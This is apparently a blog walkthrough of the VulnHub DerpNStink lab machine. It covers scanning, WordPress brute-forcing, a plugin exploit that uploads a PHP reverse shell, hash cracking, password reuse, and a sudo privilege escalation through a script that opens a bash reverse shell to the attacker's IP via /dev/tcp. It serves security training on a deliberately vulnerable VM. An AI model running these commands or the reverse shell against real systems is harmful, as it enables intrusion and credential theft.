Monday, October 14, 2019

VulnHub: DerpNStink Walkthrough

Let firs start off with an nmap scan of the remote host.

root@ubuntu:~# nmap -sS -sV -sC -T5 -O 192.168.0.30

Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-13 21:25 MDT
Nmap scan report for derpnstink.local (192.168.0.30)
Host is up (0.0049s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.2
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 12:4e:f8:6e:7b:6c:c6:d8:7c:d8:29:77:d1:0b:eb:72 (DSA)
|   2048 72:c5:1c:5f:81:7b:dd:1a:fb:2e:59:67:fe:a6:91:2f (RSA)
|   256 06:77:0f:4b:96:0a:3a:2c:3b:f0:8c:2b:57:b5:97:bc (ECDSA)
|_  256 28:e8:ed:7c:60:7f:19:6c:e3:24:79:31:ca:ab:5d:2d (EdDSA)
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 2 disallowed entries 
|_/php/ /temporary/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: DeRPnStiNK
MAC Address: 08:00:27:D1:5F:6A (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.71 seconds
root@ubuntu:~#

As you can see we found two open ports 22 and 80. Lets navigate to the website and see what it looks like.

Our next task is to run nikto against the host to see if it finds anything interesting. 

root@ubuntu:~/src/nikto/program# ./nikto.pl -host 192.168.0.30
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.0.30
+ Target Hostname:    192.168.0.30
+ Target Port:        80
+ Start Time:         2019-10-13 21:27:56 (GMT-6)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/temporary/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.39). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: 512, size: 55dcb6aaa2f50, mtime: gzip
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.22
+ OSVDB-3233: /icons/README: Apache default file found.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 7948 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2019-10-13 21:28:49 (GMT-6) (53 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@ubuntu:~/src/nikto/program#

Nikto came back with a directory for '/temporary/' in robots.txt. If we visit robots.txt we find: 

User-agent: *
Disallow: /php/
Disallow: /temporary/

We check both the directories with no success. But if we view-source on the main page we find this in the source code. <-- @stinky, make sure to update your hosts file with local dns so the new derpnstink blog can be reached before it goes live -->

If we browse to the webnote directory we are greeted with this command output of a user named 'stinky' running a whois query on the server. So this gives us a user name on the system stinky.

I decided to run dirb on the remote host to see what it finds. 

---- Scanning URL: http://192.168.0.30/ ----
==> DIRECTORY: http://192.168.0.30/css/                                                                                                                 
+ http://192.168.0.30/index.html (CODE:200|SIZE:1298)                                                                                                   
==> DIRECTORY: http://192.168.0.30/javascript/                                                                                                          
==> DIRECTORY: http://192.168.0.30/js/                                                                                                                  
==> DIRECTORY: http://192.168.0.30/php/                                                                                                                 
+ http://192.168.0.30/robots.txt (CODE:200|SIZE:53)                                                                                                     
+ http://192.168.0.30/server-status (CODE:403|SIZE:292)                                                                                                 
==> DIRECTORY: http://192.168.0.30/temporary/                                                                                                           
==> DIRECTORY: http://192.168.0.30/weblog/    
+ http://192.168.0.30/php/info.php (CODE:200|SIZE:0)                                                                                                    
==> DIRECTORY: http://192.168.0.30/php/phpmyadmin/

It looks like we got a wordpress installation at /weblog/ and a phpmyadmin installation at /php/phpmyadmin. if we visit both sites we see thier respective pages.

Its now time to run wpscan on the /weblog/ directory. After running wpscan enumerating users and plugins we get back some promising results. We brute-forced the 'admin' user and found a vulnerable plugin for wordpress. 

[+] admin
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] unclestinky
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[SUCCESS] - admin / admin                                                                                                                                
Trying unclestinky / seb Time: 00:07:48 <==========================================================               > (17884 / 22286) 80.24%  ETA: 00:01:55
[i] Valid Combinations Found:
 | Username: admin, Password: admin

[+] slideshow-gallery
 | Location: http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/
 | Last Updated: 2019-07-12T13:09:00.000Z
 | [!] The version is out of date, the latest version is 1.6.12

Our next task is to try and exploit this slideshow-gallery bug and upload a shell to the box. The shell I will be using is actually a reverse connect shell written in php over at pentestmonkey. 

python wp_gallery_slideshow_146_suv.py -t http[s]://192.168.0.30/weblog/ -u admin -p admin -f php-reverse-shell.php

Once we run the exploit we vist the page http://192.168.0.30/weblog/wp-content/uploads/slideshow-gallery/php-reverse-shell.php and get out connect back shell. 

root@ubuntu:~# nc -l -p 4444
Linux DeRPnStiNK 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 i686 i686 GNU/Linux
 09:01:52 up 1 day, 21:46,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
$

We cat the /etc/passwd file and find two users, stinky and mrderp. we found the username stinky earlier in webnotes directory. 

stinky:x:1001:1001:Uncle Stinky,,,:/home/stinky:/bin/bash
mrderp:x:1000:1000:Mr. Derp,,,:/home/mrderp:/bin/bash

We find the database login details in wp-config.php and we connect to the database and query the wp_users table to extract the password hashes. 

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'mysql');

|  1 | unclestinky | $P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41 |
|  2 | admin       | $P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/ |

We load up John the ripper and crack the hash which equates to 'wedgie57' we will use this password to try and login to the stinky account on the box. 

$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41

Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:05 0.53% (ETA: 21:10:23) 0g/s 17618p/s 17618c/s 17618C/s austin101..861204
wedgie57         (?)
1g 0:00:02:31 DONE (2019-10-12 20:57) 0.006607g/s 18476p/s 18476c/s 18476C/s wedner10..wedder15
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed

Once we found the password to stinkys user account on wordpress we try to su to the user stinky on the box with the supplied password with success. 

www-data@DeRPnStiNK:/$ su stinky
su stinky
Password: wedgie57

stinky@DeRPnStiNK:/$ id
id
uid=1001(stinky) gid=1001(stinky) groups=1001(stinky)
stinky@DeRPnStiNK:/$

It worked! Now lets move in to the home directory of stinky and see what it has to offer. After browsing around a bit I find a flag. 

stinky@DeRPnStiNK:~/Desktop$ cat flag.txt
cat flag.txt
flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)
stinky@DeRPnStiNK:~/Desktop$

If we investigate further we find a pcap file in /Documents which seem of some interest. I downloaded it to my box and fired up wireshark.

We find a login for mrderp in the pcap file. 

Password: derpderpderpderpderpderpderp

We can try and su to mrderp in the current shell and see if the password works. 

stinky@DeRPnStiNK:~/Documents$ su mrderp
su mrderp
Password: derpderpderpderpderpderpderp

mrderp@DeRPnStiNK:/home/stinky/Documents$ id
id
uid=1000(mrderp) gid=1000(mrderp) groups=1000(mrderp)
mrderp@DeRPnStiNK:/home/stinky/Documents$

We check sudo permissions first for the user mrderp. 

mrderp@DeRPnStiNK:/home/stinky/Documents$ sudo -l
sudo -l
[sudo] password for mrderp: derpderpderpderpderpderpderp

Matching Defaults entries for mrderp on DeRPnStiNK:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User mrderp may run the following commands on DeRPnStiNK:
    (ALL) /home/mrderp/binaries/derpy*
mrderp@DeRPnStiNK:/home/stinky/Documents$

We can run sudo but only for binaries located in the binaries directory and starting with the name derpy*. Lets create the directory /binaries/ and our own binary to spawn a root shell on the host. 

mrderp@DeRPnStiNK:~/binaries$ echo '#!/bin/bash' >> derpy.sh
mrderp@DeRPnStiNK:~/binaries$ echo 'bash -i >& /dev/tcp/192.168.0.42/444 0>&1' >> derpy.sh
mrderp@DeRPnStiNK:~/binaries$ sudo ./derpy.sh

Once we run the script we check our terminal for a succesufful connect back to our local host. 

root@DeRPnStiNK:~/binaries# id
id
uid=0(root) gid=0(root) groups=0(root)
root@DeRPnStiNK:~/binaries# whoami
whoami
root
root@DeRPnStiNK:~/binaries#

We got ROOT! so now lets see if we can find the final flag of the challenge. 

root@DeRPnStiNK:/root/Desktop# ls -l
ls -l
total 4
-rw-r--r-- 1 root root 180 Jan  9  2018 flag.txt
root@DeRPnStiNK:/root/Desktop# cat flag.txt
cat flag.txt
flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd)

Congrats on rooting my first VulnOS!

Hit me up on twitter and let me know your thoughts!

@securekomodo

root@DeRPnStiNK:/root/Desktop#
And thats all there is too it.
at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Exploiting Weak WEBDAV Configurations

The server we are going to audit has the following fingerprint. 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) Next we need t...

  • Enumerating SNMP Servers with NMAP
    NMAP gives you the ability to use scripts to enumerate and exploit remote host with the use of the NMAP Scripting Engine. Today we will be ...
  • Exploring POP3 Servers
    Scanning the remote host We can use NMAP to scan the remote host and run enumeration scripts against the POP3 server. root@asus:~/unix% ...
  • Enumerating SMTP Servers with NMAP
    NMAP gives you the ability to enumerate SMTP service with some scripts from the NMAP Scripting Enigne. These scripts will produce some gene...
  • Testing LDAP servers with examples
    Today we are going to be attacking the remote service LDAP. The only thing we need is an IP Address so lets ping our host to verify its up ...
  • Enumerating UNIX usernames
    Sometimes you may come across a situation where all you have from your OSINT phase is a list of first and last names. you can use pre-built...
  • Metasploitable II: Samba Shares
    Lets first start off with an nmap scan of the remote host. root@ubuntu:~# nmap -p 139,445 -sV -sC 192.168.56.101 Starting Nmap 7.60 ( ht...
  • DVWA: File Upload
    Our goal is to exploit the weakness in file upload checking and obtain a remote system shell on the host. We start off with the security b...
  • bWAPP XSS Injections
    Cross-site-Scripting - Reflected (GET) Payload: <script>alert(1)</script> Cross-site-Scripting - Reflected (POST) Payload:...
  • bWAPP CSRF
    CSRF (Change Password) The first challenge is the change password CSRF. Our goal is to successfully change the users password with out log...
  • bWAPP Remote & Local File Inclusion (RFI/LFI)
    In bWAPP There is a module for RFI and LFI injections. Our goal is to exploit these vulnerabilities and get local access to the remote mac...